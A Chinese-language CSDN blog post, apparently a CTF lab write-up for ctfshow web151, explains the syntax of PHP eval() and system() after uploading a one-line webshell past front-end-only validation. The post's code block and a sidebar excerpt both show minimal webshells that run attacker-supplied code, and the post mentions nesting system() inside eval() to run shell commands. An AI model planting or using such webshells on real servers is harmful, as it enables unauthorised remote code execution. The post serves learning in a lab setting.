php中eval和system的细节使用(配合文件上传漏洞)

最新推荐文章于 2024-08-03 14:13:13 发布
最新推荐文章于 2024-08-03 14:13:13 发布
阅读量1.6k 收藏 24
点赞数 35
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuppie001/article/details/135074674
版权

标题

一.简单介绍eval()和system()

1.eval()

2.system()

具体使用细节

一.简单介绍eval()和system():

1.eval():函数用于执行作为字符串提供的 PHP 代码。这意味着它将一个 PHP 代码字符串作为参数,并执行它,就像它是常规的 PHP 代码一样。

2.system(): 函数用于在 PHP 脚本中执行外部程序或者 shell 命令。它将命令传递给命令行并输出结果。

二.具体使用细节

1.eval()

这里配合文件上传漏洞进行讲解
靶场环境ctfshow-web151:
在这里插入图片描述
创捷文件名为123.php的文件,写入代码:

<?php 
$a = $_GET['a'];
eval($a);
?>

由于是前端验证直接改掉前端的js就可以了,这里就不演示了。
在这里插入图片描述
上传成功,现在进行命令执行。
在这里插入图片描述
成功执行。
现在开始提问:
为什么a=phpinfo();后面需要加上分号";"

我们知道源代码,如果加上分号就会变成eval( phpinfo(); ); 显然这是违法php语法规则的
在这里插入图片描述
(后面回答太长没截图了)
那么问题出现在哪呢?答案是使用 eval() 函数时,需要将要执行的代码作为字符串传递给它
正确的语法应该是:

eval('phpinfo();');

由于$a = $_POST[‘a’];
而 $_POST[‘a’];它返回的类型是字符串,所以需要加上分号
注意的是:
eval(phpinfo());是一个错误的语法,但我通过实验发现它仍然会执行(但会报错误提示),初学者容易搞错。
在这里插入图片描述
所以可以暂且认为:

eval(‘phpinfo();’)=eval(phpinfo())

2.system()

通过简单的测试就能得出:
在这里插入图片描述
在这里插入图片描述
*使用system(‘dir’)正常 而使用system(dir)会警告但仍然执行
所以姑且:
 system(‘’)=system()

另外这道ctfshow的web题上传eval()成功后可以使用eval(system())嵌套来执行系统命令。

总结:不管是system还是eval括号里正确的语法跟的都是字符串参数

Yuppie001
关注
Web安全--文件上传漏洞--通用漏洞--PHP
weixin_68243135的博客
11-17 770
Web安全--文件上传--绕过--php
DVWA靶场--文件上传漏洞(low、medium、high等级)
c_programj的博客
04-16 8399
dvwa靶场实践-低高三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
PHP eval函数使用介绍
12-18
代码: eval("echo'hello world';"); 上边代码等同于下边的代码: echo"hello world"; 在浏览器都输出:hello world 运用eval()要注意几点: 1.eval函数的参数的字符串末尾一定要有分号,在最后还要另加一个分号(这个分号是php限制) 2.注意单引号,双引号和反斜杠的运用。如果参数带有变量时,并且变量有赋值操作的话,变量前的$符号钱一定要有\来转义。如果没有赋值操作可以不需要。 代码: $a=100; eval("echo$a;"); 因为没有赋值操作,所以可以不用\来转义$.等同于以下代码: $a=100; eval("e
php常见代码执行函数和常见系统命令执行函数。
最新发布
weixin_67840381的博客
08-03 259
a($b)动态函数。可成功写入一句话木马。实验靶场以及页面源码。
PHP eval()函数
苦艾文艺
08-31 503
eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串调用 return 语句,则返回 NULL。如果代码存在解析错误,则 eval() 函数返回 false。For Example: class Pass{ private $var1; private $var2;
php eval 函数
马金波
09-04 391
http://php.net/eval //获取user_id 内的id的值 // $user['user_id'] = ' &quot;id&quot; =&amp;gt; &quot;123454321&quot; '; eval('$user_id_arr = array(' .$user['user_id']. ');'); $id = $user_id_arr['id']);
php eval()函数
yzl_007的博客
10-08 6898
php eval()函数 (PHP 4, PHP 5, PHP 7, PHP 8) eval — 把字符串作为PHP代码执行 说明 eval(string $code) 把字符串 code 作为PHP代码执行。 函数eval()语言结构是 *非常危险*的, 因为它允许执行任意 PHP 代码。 *它这样用是很危险的。* 如果您仔细的确认过,除了使用此结构以外 别无方法, 请多加注意,*不要允许传入任何由用户 提供的、未经完整验证过的数据* 。 范例 示例 #1 eval(
PHP编程的常见漏洞和代码实例
10-25
为了防止远程文件包含漏洞开发者应当避免使用动态文件名,并且在可能的情况下,关闭`allow_url_fopen`和`allow_url_include`配置选项。 三、文件上载的安全漏洞 文件上载功能在Web应用非常常见,但在实现时需要...
WEB漏洞——文件上传
qq_63594215的博客
04-09 1225
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类,当该扩展名文件被访问的时候,浏览器会自动使用知道应用程序来打开。多用于知道一些客户端自定义的文件名,以及一些媒体文件打开方式。网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除文件。网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。
PHP漏洞全解(详细介绍)
10-27
目录穿越漏洞允许攻击者访问服务器上的敏感目录和文件,比如访问源代码、配置文件或其他敏感数据。防御措施包括对用户输入进行限制,确保不能通过输入访问到服务器上不允许的目录。 12. 远程文件包含攻击(Remote ...
PHP eval() 函数
weixin_33875564的博客
03-17 157
eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串调用 return 语句,则返回 NULL。如果代码存在解析错误,则 eval() 函数返回 false &lt;?php $string = "beautiful"; $time = "winter"; $str = 'This is a $s...
PHP后门的eval类和system类 函数到底有哪些区别
weixin_30760895的博客
12-27 566
一、   一直以来对PHPeval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。 二、PHPeval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类) 1、简单类 1 //#1-eval 2 <?php 3 eval($_POST[...
eval函数和system函数的区别——代码执行漏洞和命令执行漏洞
weixin_43376075的博客
03-29 6024
eval()函数和system()函数的区别(代码执行和命令执行)
php system eval,PHP后门的eval类和system类 函数到底有哪些区别
weixin_31960145的博客
04-12 908
一、一直以来对PHPeval这一类函数和system这一类存在疑惑的地方,今天彻底研究了一下,写查PHP一句话的时候可以更有把握一些。其实都是一些满基础的知识,大佬别喷。干安全的基础很重要。二、PHPeval类型函数,一句话:代码执行而不是命令执行。(菜刀用这类)1、简单类//#1-evaleval($_POST["cmd"])?>//post:cmd=phpinfo();//#2-as...
eval函数和system函数的区别 --代码执行和命令执行
snowlyzz的博客
07-15 1583
eval函数和system函数的区别
phpeval
weixin_33734785的博客
05-01 237
2019独角兽企业重金招聘Python工程师标准>>> ...
php eval函数用法----PHPeval()函数小技巧
热门推荐
也想快乐的生活
06-24 1万+
php eval函数用法----PHPeval()函数小技巧eval将值代入字符串之。语法: void eval(string code_str);传回值: 无函式种类: 数据处理内容说明本函式可将字符串之的变量值代入,通常用在处理数据库的数据上。参数 code_str 为欲处理的字符串。值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值